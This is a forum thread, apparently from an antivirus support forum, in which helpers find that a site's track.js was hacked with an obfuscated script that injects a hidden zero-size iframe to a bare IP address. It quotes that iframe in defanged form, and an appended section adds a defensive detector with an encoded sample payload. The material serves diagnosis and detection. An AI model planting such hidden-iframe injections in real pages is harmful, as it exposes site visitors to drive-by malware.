Domains Blacklisted - Please Check False Positive

Hi everybody

We think avast is blacklisting our websites, as it is blocking the entire domains (if web protection is activated).

silvashop.com
avlispub.com
ultramind.ws
silvaremoteviewing.com
siga.org
choose-success.org
espsy.org
silva.supportgroup.ws
silvacourses.com

We are sure this is a false positive; our sites are probably blacklisted, but we don’t know why. Can anyone help us to get rid of this trojan/false positive? Thank you very much.

Maybe a member will have the possibility to check the script and HTML code, so we can say if it's hacked or not.

Be patient, another reply may come.

Thanks.

Mr.Agent

hello dominateit,

I checked the first three websites using an online analyzer and I found this:

http://wepawet.iseclab.org/view.php?hash=bd1635191619c1de182f10a7e8601536&t=1248098797&type=js

http://wepawet.iseclab.org/view.php?hash=2bb2c5e4cc254585af2fd123f700bf60&t=1248098867&type=js

http://wepawet.iseclab.org/view.php?hash=ec9a4edcda3aabc7200639dcfdb14021&t=1248098881&type=js

and also (maybe it's because of this):

http://wepawet.cs.ucsb.edu/view.php?type=js&hash=0be374079bd158caaa8192ff1adec45c&t=1240531743

All of the websites (which I checked) contain a JavaScript from 95’DOT’129’DOT’144’DOT’229, which may be the reason why WebShield is blocking (I have not tried opening them in my browser).

HTML:IFrame-EL Trojan, file: hXtp://silvashop.com/affiliate/scripts/track.js
Is what avast says on the few sites I checked.

Hello filter,

you can take a look at this:

http://wepawet.iseclab.org/view.php?hash=6427d31756277f7ccf230111ba10f109&t=1248099554&type=js

Most likely this javascript has been hacked and modified.
In the js file there is an obfuscated script at the bottom which contains the malicious Iframe.

See the image below

That's what I was guessing. The detection of Avast! is accurate to this. ;D

Thanks for your time guys! :)

No problem ;D

You're welcome to post again if you want anything else.

Mr.Agent

Hi dominateit,

They never thought it to be benign:
http://wepawet.iseclab.org/view.php?hash=6427d31756277f7ccf230111ba10f109&t=1248116437&type=js
But it does not seem to redirect somewhere now…
The URL 95.129.144.229 seems non-existent, and also seemed blacklisted by Spamhaus…
Hidden IFrame redirect…

EDITED for security reasons by me ...iframe src="hxtp://95.129.144.229/1" WIDTH="0%" HEIGHT="0%" style="hidden" MARGINHEIGHT="0" 
MARGINWIDTH="0" SCROLLING="no" frameborder="0" NORESIZE^^/iframe^
(repeated 1 time) 

See the Bad Stuff Detektor report:
No zeroiframes detected!
Check took 3.16 seconds

(Level: 0) Url checked:
hxtp://silvashop.com
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 1) Url checked: (script source)
hxtp://silvashop.com/affiliate/scripts/track.js
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 2) Url checked: (script source)
hxtp://silvashop.com/affiliate/scripts/
Blank page / could not connect
No ad codes identified

(Level: 1) Url checked: (script source)
hxtp://www.google-analytics.com/urchin.js
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 1) Url checked: (script source)
hxtp://edge.quantserve.com/quant.js
Zeroiframes detected on this site: 0
No ad codes identified

polonus
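
Added example, not part of any post in this thread: a check a site owner could run over their own script files (such as the track.js flagged above) to find zero-size iframes, including ones that only appear after simple string decoding. The encoding used in the sample, the function names and the 192.0.2.1 address are assumptions; the thread does not show how the injected script was obfuscated.

```javascript
// Undo percent-escapes, \xNN / \uNNNN escapes and String.fromCharCode(...) lists.
function decodeLayers(text, maxRounds = 3) {
  const hex = (_, h) => String.fromCharCode(parseInt(h, 16));
  let current = text;
  for (let i = 0; i < maxRounds; i++) {
    const next = current
      .replace(/%([0-9a-fA-F]{2})/g, hex)
      .replace(/\\x([0-9a-fA-F]{2})/g, hex)
      .replace(/\\u([0-9a-fA-F]{4})/g, hex)
      .replace(/String\.fromCharCode\(([\d\s,]+)\)/g, (_, list) =>
        String.fromCharCode(...list.split(',').map(n => parseInt(n, 10))));
    if (next === current) break; // nothing left to decode
    current = next;
  }
  return current;
}

// Report iframes that are zero-sized or styled invisible in the decoded text.
function findHiddenIframes(scriptText) {
  const decoded = decodeLayers(scriptText);
  const findings = [];
  for (const [tag] of decoded.matchAll(/<iframe\b[^>]*>/gi)) {
    const attr = name => {
      const m = tag.match(new RegExp(`\\b${name}\\s*=\\s*["']?([^"'\\s>]+)`, 'i'));
      return m ? m[1] : null;
    };
    const zero = v => v !== null && /^0(%|px)?$/i.test(v);
    const hidden = zero(attr('width')) || zero(attr('height')) ||
      /display\s*:\s*none|visibility\s*:\s*hidden/i.test(tag);
    if (!hidden) continue;
    const src = attr('src');
    findings.push({
      src,
      // A bare IPv4 host is unusual for a legitimate third-party include.
      ipHost: src !== null && /^[a-z]+:\/\/\d{1,3}(\.\d{1,3}){3}([:\/]|$)/i.test(src),
      // True when the tag is not present verbatim in the file as served.
      obfuscated: !scriptText.includes(tag),
    });
  }
  return findings;
}

// Constructed sample: a tracking script with an encoded write appended.
// 192.0.2.1 is a documentation address, not the host named in the thread.
const SAMPLE_TRACK_JS = 'function track(id) { return "aff=" + id; }\n' +
  'document.write(unescape("%3Ciframe%20src%3D%22http%3A//192.0.2.1/1%22%20' +
  'width%3D%220%25%22%20height%3D%220%25%22%20frameborder%3D%220%22%3E%3C/iframe%3E"));';
console.log(findHiddenIframes(SAMPLE_TRACK_JS));
```

A finding with `obfuscated: true` means a plain text search of the file for `<iframe` would have come back empty, so comparing the file against a known-good copy from backup or version control is the next step.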